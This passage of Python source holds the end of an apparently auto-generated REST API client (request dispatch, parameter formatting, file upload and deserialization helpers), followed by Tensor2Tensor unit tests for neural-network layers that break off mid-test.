query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""
Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in iteritems(params) if isinstance(params, dict) else params:
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def prepare_post_parameters(self, post_params=None, files=None):
"""
Builds form parameters.
:param post_params: Normal form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if post_params:
params = post_params
if files:
for k, v in iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = mimetypes.\
guess_type(filename)[0] or 'application/octet-stream'
params.append(tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""
Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""
Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
"""
Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
"""
config = Configuration()
if not auth_settings:
return
for auth in auth_settings:
auth_setting = config.auth_settings().get(auth)
if auth_setting:
if not auth_setting['value']:
continue
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
:return: file path.
"""
config = Configuration()
fd, path = tempfile.mkstemp(dir=config.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.\
search(r'filename=[\'"]?([^\'"\s]+)[\'"]?', content_disposition).\
group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "w") as f:
f.write(response.data)
return path
def __deserialize_primitive(self, data, klass):
"""
Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return text(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""
Return a original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""
Deserializes string to date.
:param string: str.
:return: date.
"""
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise ApiException(
status=0,
reason="Failed to parse `{0}` into a date object".format(string)
)
def __deserialize_datetime(self, string):
"""
Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:return: datetime.
"""
try:
from dateutil.parser import parse
timestr = str(datetime.fromtimestamp(string/1000))
return parse(timestr)
except ImportError:
return string
except ValueError:
raise ApiException(
status=0,
reason=(
"Failed to parse `{0}` into a datetime object"
.format(string)
)
)
def __deserialize_model(self, data, klass):
"""
Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
if not klass.swagger_types:
return data
kwargs = {}
for attr, attr_type in iteritems(klass.swagger_types):
if data is not None \
and klass.attribute_map[attr] in data \
and isinstance(data, (list, dict)):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
return instance
|
|
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for common layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensor2tensor.layers import common_layers
import tensorflow as tf
class CommonLayersTest(parameterized.TestCase, tf.test.TestCase):
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testIndexLastDimWithIndices(self):
x = np.array([[2., 3., 4., 5.],
[6., 7., 8., 9.]])
indices = np.array([2, 0])
x_idx = common_layers.index_last_dim_with_indices(x, indices)
expected = np.array([4., 6.])
self.assertAllEqual(expected, self.evaluate(x_idx))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSaturatingSigmoid(self):
x = np.array([-120.0, -100.0, 0.0, 100.0, 120.0], dtype=np.float32)
y = common_layers.saturating_sigmoid(tf.constant(x))
res = self.evaluate(y)
self.assertAllClose(res, [0.0, 0.0, 0.5, 1.0, 1.0])
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testFlatten4D3D(self):
x = np.random.random_integers(1, high=8, size=(3, 5, 2))
y = common_layers.flatten4d3d(common_layers.embedding(x, 10, 7))
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (3, 5 * 2, 7))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testEmbedding(self):
x = np.random.random_integers(1, high=8, size=(3, 5))
y = common_layers.embedding(x, 10, 16)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (3, 5, 16))
def testShakeShake(self):
x = np.random.rand(5, 7)
with self.test_session() as session:
x = tf.constant(x, dtype=tf.float32)
y = common_layers.shakeshake([x, x, x, x, x])
inp, res = session.run([x, y])
self.assertAllClose(res, inp)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConv(self):
x = np.random.rand(5, 7, 1, 11)
y = common_layers.conv(tf.constant(x, dtype=tf.float32), 13, (3, 1))
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 5, 1, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConv1d(self):
x = np.random.rand(5, 7, 11)
y = common_layers.conv1d(tf.constant(x, dtype=tf.float32), 13, 1)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSeparableConv(self):
x = np.random.rand(5, 7, 1, 11)
y = common_layers.separable_conv(
tf.constant(x, dtype=tf.float32), 13, (3, 1))
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 5, 1, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSubSeparableConv(self):
for sep in [0, 1, 2, 4]:
x = np.random.rand(5, 7, 1, 12)
with tf.variable_scope("sep_%d" % sep):
y = common_layers.subseparable_conv(
tf.constant(x, dtype=tf.float32), 16, (3, 1), separability=sep)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 5, 1, 16))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConvBlock(self):
x = np.random.rand(5, 7, 1, 11)
y = common_layers.conv_block(
tf.constant(x, dtype=tf.float32),
13, [(1, (3, 3)), (1, (3, 3))],
padding="SAME",
normalizer_fn=common_layers.noam_norm)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 1, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSeparableConvBlock(self):
x = np.random.rand(5, 7, 1, 11)
y = common_layers.separable_conv_block(
tf.constant(x, dtype=tf.float32),
13, [(1, (3, 3)), (1, (3, 3))],
padding="SAME")
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 1, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSubSeparableConvBlock(self):
for sep in [0, 1, 2, 4]:
x = np.random.rand(5, 7, 1, 12)
with tf.variable_scope("sep_%d" % sep):
y = common_layers.subseparable_conv_block(
tf.constant(x, dtype=tf.float32),
16, [(1, (3, 3)), (1, (3, 3))],
padding="SAME",
separability=sep)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 1, 16))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testPool(self):
x = np.random.rand(5, 8, 1, 11)
y = common_layers.pool(
tf.constant(x, dtype=tf.float32), (2, 2), "AVG", "SAME")
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 8, 1, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConvBlockDownsample(self):
x = np.random.rand(5, 7, 1, 11)
y = common_layers.conv_block_downsample(
tf.constant(x, dtype=tf.float32), (3, 1), (2, 1), "SAME")
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 4, 1, 27))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSimpleAttention(self):
x = np.random.rand(5, 7, 1, 11)
y = np.random.rand(5, 9, 1, 11)
a = common_layers.simple_attention(
tf.constant(x, dtype=tf.float32), tf.constant(y, dtype=tf.float32))
res = self.evaluate(a)
self.assertEqual(res.shape, (5, 7, 1, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testGetTimingSignal(self):
length = 7
num_timescales = 10
a = common_layers.get_timing_signal(length, num_timescales=num_timescales)
res = self.evaluate(a)
self.assertEqual(res.shape, (length, 2 * num_timescales))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testAddTimingSignal(self):
batch = 5
length = 7
height = 3
depth = 35
x = np.random.rand(batch, length, height, depth)
a = common_layers.add_timing_signal(tf.constant(x, dtype=tf.float32))
res = self.evaluate(a)
self.assertEqual(res.shape, (batch, length, height, depth))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testAttention1D(self):
batch = 5
target_length = 7
source_length = 13
source_depth = 9
target_depth = 11
attention_size = 21
output_size = 15
num_heads = 7
source = np.random.rand(batch, source_length, source_depth)
target = np.random.rand(batch, target_length, target_depth)
mask = np.random.rand(batch, target_length, source_length)
a = common_layers.attention_1d_v0(
tf.constant(source, dtype=tf.float32),
tf.constant(target, dtype=tf.float32), attention_size, output_size,
num_heads, tf.constant(mask, dtype=tf.float32))
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(a)
self.assertEqual(res.shape, (batch, target_length, output_size))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testMultiscaleConvSum(self):
x = np.random.rand(5, 9, 1, 11)
y = common_layers.multiscale_conv_sum(
tf.constant(x, dtype=tf.float32),
13, [((1, 1), (5, 5)), ((2, 2), (3, 3))],
"AVG",
padding="SAME")
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 9, 1, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConvGRU(self):
x = np.random.rand(5, 7, 3, 11)
y = common_layers.conv_gru(tf.constant(x, dtype=tf.float32), (1, 3), 11)
z = common_layers.conv_gru(
tf.constant(x, dtype=tf.float32), (1, 3), 11, padding="LEFT")
self.evaluate(tf.global_variables_initializer())
res1 = self.evaluate(y)
res2 = self.evaluate(z)
self.assertEqual(res1.shape, (5, 7, 3, 11))
self.assertEqual(res2.shape, (5, 7, 3, 11))
def testSRU(self):
x = np.random.rand(5, 7, 3, 11)
with self.test_session() as session:
y = common_layers.sru(tf.constant(x, dtype=tf.float32))
session.run(tf.global_variables_initializer())
res = session.run(y)
self.assertEqual(res.shape, (5, 7, 3, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testLayerNorm(self):
x = np.random.rand(5, 7, 11)
y = common_layers.layer_norm(tf.constant(x, dtype=tf.float32), 11)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testGroupNorm(self):
x = np.random.rand(5, 7, 3, 16)
y = common_layers.group_norm(tf.constant(x, dtype=tf.float32))
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 3, 16))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConvLSTM(self):
x = np.random.rand(5, 7, 11, 13)
y = common_layers.conv_lstm(tf.constant(x, dtype=tf.float32), (1, 3), 13)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 11, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testPadToSameLength(self):
x1 = np.random.rand(5, 7, 11)
x2 = np.random.rand(5, 9, 11)
a, b = common_layers.pad_to_same_length(
tf.constant(x1, dtype=tf.float32), tf.constant(x2, dtype=tf.float32))
c, d = common_layers.pad_to_same_length(
tf.constant(x1, dtype=tf.float32),
tf.constant(x2, dtype=tf.float32),
final_length_divisible_by=4)
res1, res2 = self.evaluate([a, b])
res1a, res2a = self.evaluate([c, d])
self.assertEqual(res1.shape, (5, 9, 11))
self.assertEqual(res2.shape, (5, 9, 11))
self.assertEqual(res1a.shape, (5, 12, 11))
self.assertEqual(res2a.shape, (5, 12, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testShiftLeft(self):
x1 = np.zeros((5, 7, 1, 11))
x1[:, 0, :] = np.ones_like(x1[:, 0, :])
expected = np.zeros((5, 7, 1, 11))
expected[:, 1, :] = np.ones_like(expected[:, 1, :])
a = common_layers.shift_right(tf.constant(x1, dtype=tf.float32))
actual = self.evaluate(a)
self.assertAllEqual(actual, expected)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConvStride2MultiStep(self):
x1 = np.random.rand(5, 32, 16, 11)
a = common_layers.conv_stride2_multistep(
tf.constant(x1, dtype=tf.float32), 4, 16)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(a[0])
self.assertEqual(actual.shape, (5, 2, 1, 16))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testDeconvStride2MultiStep(self):
x1 = np.random.rand(5, 2, 1, 11)
a = common_layers.deconv_stride2_multistep(
tf.constant(x1, dtype=tf.float32), 4, 16)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(a)
self.assertEqual(actual.shape, (5, 32, 1, 16))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testApplyNormLayer(self):
x1 = np.random.rand(5, 2, 1, 11)
x2 = common_layers.apply_norm(
tf.constant(x1, dtype=tf.float32), "layer", depth=11, epsilon=1e-6)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(x2)
self.assertEqual(actual.shape, (5, 2, 1, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testApplyNormNoam(self):
x1 = np.random.rand(5, 2, 1, 11)
x2 = common_layers.apply_norm(
tf.constant(x1, dtype=tf.float32), "noam", depth=11, epsilon=1e-6)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(x2)
self.assertEqual(actual.shape, (5, 2, 1, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testApplyNormBatch(self):
x1 = np.random.rand(5, 2, 1, 11)
x2 = common_layers.apply_norm(
tf.constant(x1, dtype=tf.float32), "batch", depth=11, epsilon=1e-6)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(x2)
self.assertEqual(actual.shape, (5, 2, 1, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testApplyNormNone(self):
x1 = np.random.rand(5, 2, 1, 11)
x2 = common_layers.apply_norm(
tf.constant(x1, dtype=tf.float32), "none", depth=11, epsilon=1e-6)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(x2)
self.assertEqual(actual.shape, (5, 2, 1, 11))
self.assertAllClose(actual, x1, atol=1e-03)
def testGlobalPool1d(self):
x1 = np.random.rand(5, 4, 11)
no_mask = np.ones((5, 4))
full_mask = np.zeros((5, 4))
x1_ = tf.Variable(x1, dtype=tf.float32)
no_mask_ = tf.Variable(no_mask, dtype=tf.float32)
full_mask_ = tf.Variable(full_mask, dtype=tf.float32)
none_mask_max = common_layers.global_pool_1d(x1_)
no_mask_max = common_layers.global_pool_1d(x1_, mask=no_mask_)
result1 = tf.reduce_sum(none_mask_max - no_mask_max)
full_mask_max = common_layers.global_pool_1d(x1_, mask=full_mask_)
result2 = tf.reduce_sum(full_mask_max)
none_mask_avr = common_layers.global_pool_1d(x1_, "AVR")
no_mask_avr = common_layers.global_pool_1d(x1_, "AVR", no_mask_)
result3 = tf.reduce_sum(none_mask_avr - no_mask_avr)
full_mask_avr = common_layers.global_pool_1d(x1_, "AVR", full_mask_)
result4 = tf.reduce_sum(full_mask_avr)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate([result1, result2, result3, result4])
self.assertAllEqual(actual[:3], [0.0, 0.0, 0.0])
def testLinearSetLayer(self):
x1 = np.random.rand(5, 4, 11)
cont = np.random.rand(5, 13)
x1_ = tf.Variable(x1, dtype=tf.float32)
cont_ = tf.Variable(cont, dtype=tf.float32)
simple_ff = common_layers.linear_set_layer(32, x1_)
cont_ff = common_layers.linear_set_layer(32, x1_, context=cont_)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate([simple_ff, cont_ff])
self.assertEqual(actual[0].shape, (5, 4, 32))
self.assertEqual(actual[1].shape, (5, 4, 32))
def testRavanbakhshSetLayer(self):
x1 = np.random.rand(5, 4, 11)
x1_ = tf.Variable(x1, dtype=tf.float32)
layer = common_layers.ravanbakhsh_set_layer(32, x1_)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(layer)
self.assertEqual(actual.shape, (5, 4, 32))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testBReLU(self):
x = np.random.rand(5, 2, 1, 12)
y = common_layers.brelu(tf.constant(x, dtype=tf.float32))
actual = self.evaluate(y)
self.assertEqual(actual.shape, (5, 2, 1, 12))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testBELU(self):
x = np.random.rand(5, 2, 1, 12)
y = common_layers.belu(tf.constant(x, dtype=tf.float32))
actual = self.evaluate(y)
self.assertEqual(actual.shape, (5, 2, 1, 12))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testNAC(self):
x = np.random.rand(5, 2, 1, 12)
y = common_layers.nac(tf.constant(x, dtype=tf.float32), 14)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(y)
self.assertEqual(actual.shape, (5, 2, 1, 14))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testNALU(self):
x = np.random.rand(5, 2, 1, 12)
y = common_layers.nalu(tf.constant(x, dtype=tf.float32), 14)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(y)
self.assertEqual(actual.shape, (5, 2, 1, 14))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testNALUzeros(self):
x = np.random.rand(5, 2, 1, 12)
y = common_layers.nalu(tf.zeros_like(x, dtype=tf.float32), 14)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(y)
self.assertTrue(np.all(np.isfinite(actual)))
self.assertEqual(actual.shape, (5, 2, 1, 14))
def testPaddingCrossEntropyFactored(self):
vocab_size = 19
rows = 5
cols = 4
depth = 11
label_smoothing = 0.1
features = np.random.rand(rows, cols, depth)
weights = np.random.rand(vocab_size, depth)
labels = np.random.randint(0, vocab_size - 1, size=(rows, cols))
with self.test_session() as session:
features = tf.to_float(features)
weights = tf.to_float(weights)
labels = tf.to_int32(labels)
logits = tf.matmul(
tf.reshape(features, [rows * cols, depth]), weights, transpose_b=True)
logits = tf.reshape(logits, [rows, cols, vocab_size])
loss_num, loss_den = common_layers.padded_cross_entropy(
logits, labels, label_smoothing=label_smoothing, reduce_sum=False)
factored_logits = common_layers.FactoredTensor(features, weights)
loss_num_f, loss_den_f = common_layers.padded_cross_entropy_factored(
factored_logits,
labels=labels,
label_smoothing=label_smoothing,
reduce_sum=False)
num, den, num_f, den_f = session.run(
[loss_num, loss_den, loss_num_f, loss_den_f])
self.assertEqual(num.shape, (rows, cols))
self.assertEqual(den.shape, (rows, cols))
self.assertEqual(num_f.shape, (rows, cols))
self.assertEqual(den_f.shape, (rows, cols))
self.assertAllClose(num, num_f)
self.assertAllClose(den, den_f)
def testPaddingCrossEntropyFactoredGrad(self):
vocab_size = 19
rows = 5
cols = 4
depth = 11
label_smoothing = 0.1
features = np.random.rand(rows, cols, depth)
weights = np.random.rand(vocab_size, depth)
labels = np.random.randint(0, vocab_size - 1, size=(rows, cols))
with self.test_session() as session:
features = tf.to_float(features)
weights = tf.to_float(weights)
labels = tf.to_int32(labels)
logits = tf.matmul(
tf.reshape(features, [rows * cols, depth]), weights, transpose_b=True)
logits = tf.reshape(logits, [rows, cols, vocab_size])
loss_num, loss_den = common_layers.padded_cross_entropy(
logits, labels, label_smoothing=label_smoothing, reduce_sum=False)
factored_logits = common_layers.FactoredTensor(features, weights)
loss_num_factored, loss_den_factored = (
common_layers.padded_cross_entropy_factored(
factored_logits,
labels=labels,
label_smoothing=label_smoothing,
reduce_sum=False))
df, dw = tf.gradients(ys=[loss_num, loss_den], xs=[features, weights])
df_factored, dw_factored = tf.gradients(
ys=[loss_num_factored, loss_den_factored], xs=[features, weights])
actual_df, actual_dw, actual_df_factored, actual_dw_factored = (
session.run([df, dw, df_factored, dw_factored]))
self.assertEqual(actual_df.shape, (rows, cols, depth))
self.assertEqual(actual_dw.shape, (vocab_size, depth))
self.assertEqual(actual_df_factored.shape, (rows, cols, depth))
self.assertEqual(actual_dw_factored.shape, (vocab_size, depth))
self.assertAllClose(actual_df, actual_df_factored)
self.assertAllClose(actual_dw, actual_dw_factored)
@parameterized.parameters(
(2, 4, 4, 5, True),
(2, 4, 4, 5, False),
(1, 16, 16, 1, True),
(1, 16, 16, 1, False),
)
def testDmlLoss(self, batch, height, width, num_mixtures, reduce_sum):
channels = 3
pred = tf.random_normal([batch, height, width, num_mixtures * 10])
labels = tf.random_uniform([batch, height, width, channels],
minval=0, maxval=256, dtype=tf.int32)
actual_loss_num, actual_loss_den = common_layers.dml_loss(
pred=pred, labels=labels, reduce_sum=reduce_sum)
actual_loss = actual_loss_num / actual_loss_den
real_labels = common_layers.convert_rgb_to_symmetric_real(labels)
expected_loss = common_layers.discretized_mix_logistic_loss(
pred=pred, labels=real_labels) / channels
if reduce_sum:
expected_loss = tf.reduce_mean(expected_loss)
actual_loss_val, expected_loss_val = self.evaluate(
[actual_loss, expected_loss])
self.assertAllClose(actual_loss_val, expected_loss_val)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testDiscretizedMixLogisticLoss(self):
batch = 2
height = 4
width = 4
channels = 3
num_mixtures = 5
logits = tf.concat( # assign all probability mass to first component
[tf.ones([batch, height, width, 1]) * 1e8,
tf.zeros([batch, height, width, num_mixtures - 1])],
axis=-1)
locs = tf.random_uniform([batch, height, width, num_mixtures * 3],
minval=-.9, maxval=.9)
log_scales = tf.random_uniform([batch, height, width, num_mixtures * 3],
minval=-1., maxval=1.)
coeffs = tf.atanh(tf.zeros([batch, height, width, num_mixtures * 3]))
pred = tf.concat([logits, locs, log_scales, coeffs], axis=-1)
# Test labels that don't satisfy edge cases where 8-bit value is 0 or 255.
labels = tf.random_uniform([batch, height, width, channels],
minval=-.9, maxval=.9)
locs_0 = locs[..., :3]
log_scales_0 = log_scales[..., :3]
centered_labels = labels - locs_0
inv_stdv = tf.exp(-log_scales_0)
plus_in = inv_stdv * (centered_labels + 1. / 255.)
min_in = inv_stdv * (centered_labels - 1. / 255.)
cdf_plus = tf.nn.sigmoid(plus_in)
cdf_min = tf.nn.sigmoid(min_in)
expected_loss = -tf.reduce_sum(tf.log(cdf_plus - cdf_min), axis=-1)
actual_loss = common_layers.discretized_mix_logistic_loss(
pred=pred, labels=labels)
actual_loss_val, expected_loss_val = self.evaluate(
[actual_loss, expected_loss])
self.assertAllClose(actual_loss_val, expected_loss_val, rtol=1e-5)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSampleFromDiscretizedMixLogistic(self):
batch = 2
height = 4
width = 4
num_mixtures = 5
seed = 42
logits = tf.concat( # assign all probability mass to first component
[tf.ones([batch, height, width, 1]) * 1e8,
tf.zeros([batch, height, width, num_mixtures - 1])],
axis=-1)
locs = tf.random_uniform([batch, height, width, num_mixtures * 3],
minval=-.9, maxval=.9)
log_scales = tf.ones([batch, height, width, num_mixtures * 3]) * -1e8
coeffs = tf.atanh(tf.zeros([batch, height, width, num_mixtures * 3]))
pred = tf.concat([logits, locs, log_scales, coeffs], axis=-1)
locs_0 = locs[..., :3]
expected_sample = tf.clip_by_value(locs_0, -1., 1.)
actual_sample = common_layers.sample_from_discretized_mix_logistic(
pred, seed=seed)
actual_sample_val, expected_sample_val = self.evaluate(
[actual_sample, expected_sample])
# Use a low tolerance: samples numerically differ, as the actual
# implementation clips log-scales so they always contribute to sampling.
self.assertAllClose(actual_sample_val, expected_sample_val, atol=1e-2)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testFactoredTensorImplicitConversion(self):
a = np.random.rand(3, 4, 5)
b = np.random.rand(6, 5)
c = np.random.rand(3, 4, 6)
# a factored representation of a Tensor of shape (3, 4, 6)
factored = common_layers.FactoredTensor(tf.to_float(a), tf.to_float(b))
# implicitly converts factored to a Tensor (performing the matmul)
d = factored + tf.to_float(c)
out = self.evaluate(d)
self.assertEqual(out.shape, (3, 4, 6))
def testConvHiddenReluMemoryEfficient(self):
batch = 3
length = 23
io_size = 16
filter_size = 7
x = np.random.rand(batch, length, io_size)
dy = np.random.rand(batch, length, io_size)
with self.test_session() as session:
x = tf.to_float(x)
dy = tf.to_float(dy)
f1 = tf.get_variable("f1", [1, io_size, filter_size])
f2 = tf.get_variable("f2", [1, filter_size, io_size])
norm_scale, norm_bias = common_layers.layer_norm_vars(io_size)
y = common_layers.conv_hidden_relu_memory_efficient(
x, filter_size, forget=False,
test_vars=(f1, f2, norm_scale, norm_bias))
y_forget = common_layers.conv_hidden_relu_memory_efficient(
x, filter_size, forget=True,
test_vars=(f1, f2, norm_scale, norm_bias))
dx, df1, df2, dnorm_scale, dnorm_bias = tf.gradients(
ys=[y], xs=[x, f1, f2, norm_scale, norm_bias], grad_ys=[dy])
dx_f, df1_f, df2_f, dnorm_scale_f, dnorm_bias_f = tf.gradients(
ys=[y_forget], xs=[x, f1, f2, norm_scale, norm_bias], grad_ys=[dy])
session.run(tf.global_variables_initializer())
(y, y_forget,
dx, df1, df2, dnorm_scale, dnorm_bias,
dx_f, df1_f, df2_f, dnorm_scale_f, dnorm_bias_f) = session.run(
[y, y_forget,
dx, df1, df2, dnorm_scale, dnorm_bias,
dx_f, df1_f, df2_f, dnorm_scale_f, dnorm_bias_f])
self.assertAllClose(y, y_forget)
self.assertAllClose(df2, df2_f)
self.assertAllClose(df1, df1_f)
self.assertAllClose(dnorm_scale, dnorm_scale_f)
self.assertAllClose(dnorm_bias, dnorm_bias_f)
self.assertAllClose(dx, dx_f)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testCycleGANUpsampleNnUpsampleConv(self):
batch = 8
height = 32
width = 32
num_channels = 3
output_filters = 10
stride = [2, 3] # we want height to be x2 and width to be x3
random_input = np.random.rand(batch, height, width, num_channels).astype(
np.float32)
# nn_upsample_conv gives exactly the shapes we'd expect.
upsampled_output = common_layers.cyclegan_upsample(
random_input, output_filters, stride, "nn_upsample_conv")
upsampled_output_shape = tf.shape(upsampled_output)
self.evaluate(tf.global_variables_initializer())
self.assertAllEqual(
[batch, height * stride[0], width * stride[1], output_filters],
self.evaluate(upsampled_output_shape))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testCycleGANUpsampleBilinearUpsampleConv(self):
batch = 8
height = 32
width = 32
num_channels = 3
output_filters = 10
stride = [2, 3] # we want height to be x2 and width to be x3
random_input = np.random.rand(batch, height, width, num_channels).astype(
np.float32)
# bilinear_upsample_conv gives exactly the shapes we'd expect.
upsampled_output = common_layers.cyclegan_upsample(
random_input, output_filters, stride, "bilinear_upsample_conv")
upsampled_output_shape = tf.shape(upsampled_output)
self.evaluate(tf.global_variables_initializer())
self.assertAllEqual(
